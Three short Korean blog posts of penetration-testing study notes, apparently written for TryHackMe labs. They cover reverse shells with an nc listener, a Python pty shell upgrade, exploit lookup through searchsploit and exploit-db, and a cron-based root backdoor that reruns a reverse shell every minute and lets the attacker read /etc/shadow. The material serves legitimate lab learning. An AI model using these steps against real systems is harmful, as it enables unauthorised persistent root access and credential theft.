1. 작업 환경 

    - VirtualBox

    - kali_linux

 

2. 리버스 쉘 획득 

    - 통상 서버는 방화벽에서 인바운드 규칙은 잘 설정하지만, 아웃바운드 규칙은 변수가 많이 때문에 잘 설정하지 않는다. 

      그래서 해커들을 보통 리버스 쉘을 사용함

    - 공격자 컴퓨터 포트 여는 명령 : nc -nlvp [열고자 하는 포드 번호]

    - 리버스 쉘 실행을 위한 명령어 작성해주는 곳에서 명령어를 획득하여 피해자 서버의 cmd창에서 실행 

       * 피해자 서버의 원격 코드 실행이 가능하다는 전제임

       * 리버스 쉘 관련 홈페이지 : 구글링 또는 www.revshells.com (예: 리눅스, nc mkfifo)

 

Online - Reverse Shell Generator

Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.

www.revshells.com

 

3. POST - Exploit

    □ 권한 상승

       - 운영체제 마다 다르지만 특정 운영체제에 대한 권한 상승 (privilege escalation) 구글링으로 권한 상승 정보 얻기

       - 예를 들어 리눅스의 경우 DB 관련 자료 찾기, 관련 자료에서 아이디 및 비밀번호 힌트 얻기, su root 명령어 사용시

         터미널에서 실행하라는 말이 나오면  [python -c "import pty;pty.spawn('/bin/bash')"] 명령어 사용 

    Back Door 설치 : 나중에 다시 피해 서버에 원할때 바로 들어갈 수 있도록 하는 방법

       - 리버스쉘 실행 명령어를 cron에 설정 

          * 1분마다 루트 권한으로 리버스쉘 실행 :  echo "* * * * * root [리버스쉘 명령어]" >> /etc/crontab

       - 피해자 서버에 들어가고 싶을때 설정되어 있는 공격자 컴퓨터 포트를 열면 1분 뒤에 루트 권한으로 피해자 컴퓨터

         원격 제어 가능    * 예 : nc -nlvp 9999 

    무적 상태가 됨, 루트 권한만 볼 수 있는 /etc/shadow 파일도 볼 수 있고 모든 행위가 가능해짐

'모의해킹' 카테고리의 다른 글

Exploit  (0) 2024.10.20
취약점 찾는법  (0) 2024.10.20
정보 수집 (NMAP 포트 스캔)  (1) 2024.10.20
TryHackMe 가상 서버 구동  (0) 2024.10.20
TryHackMe VPN 연결  (1) 2024.10.20

1. 작업 환경 

    - VirtualBox

    - kali_linux

 

2. 세부 방법

    - searchsploit 명령어로 취약점을 찾기

    - 취약점 중 가장 치명적인 취약점을 선택, 예를 들면 Remote Code Execution과 같은 취약점

    - 칼리리눅스에 내장되어 있는 해당 취약점에 대한 공격코드 활용, 없으면 구글링 

    - 공격코드를 fild 명령어로 찾아서 자신의 디렉토리로 복사 

    - txt는 설명한 파일, .py과 .rb 파일은 코드 살펴보고 활용, .c는 컴파일 필요 (예: gcc exploit.c -o exploit) 

       * python2 버전은 python2 명령어를 사용해야함

    

'모의해킹' 카테고리의 다른 글

리버스쉘, POST - Exploit  (0) 2024.10.20
취약점 찾는법  (0) 2024.10.20
정보 수집 (NMAP 포트 스캔)  (1) 2024.10.20
TryHackMe 가상 서버 구동  (0) 2024.10.20
TryHackMe VPN 연결  (1) 2024.10.20

1. 작업 환경 

    - VirtualBox

    - kali_linux

    - TryHackMe 

 

2. 세부 방법

    - NMAP 포트 스캔한 정보를 토대로 해당 프로세스의 분석하여 취약점 찾아내기 

      * 어렵고 시간이 많이 소요

    - 구글 검색 : [프로세스 및 버전] vulnerability

    - 구글 검색 : [프로세스 및 버전] exploit 

    - chatgpt 검색 

    - exploit-db.com 사이트에서 찾기   

    - cmd창에서 검색 : searchsploit [프로세스 및 버전]     * exploit-db.com 사이트 내 정보가 출력됨

    - 웹서버일 경우 웹서버에 접속해서 추가적인 정보 획득

    - 개인적인 생각을 정리하면 간단한 방법은 cmd창에서 검색하는 것이고, 더 많은 정보를 습득하고 싶으면 chatgpt와

      구글 검색을 활용하는 것이 적절함

'모의해킹' 카테고리의 다른 글

리버스쉘, POST - Exploit  (0) 2024.10.20
Exploit  (0) 2024.10.20
정보 수집 (NMAP 포트 스캔)  (1) 2024.10.20
TryHackMe 가상 서버 구동  (0) 2024.10.20
TryHackMe VPN 연결  (1) 2024.10.20

+ Recent posts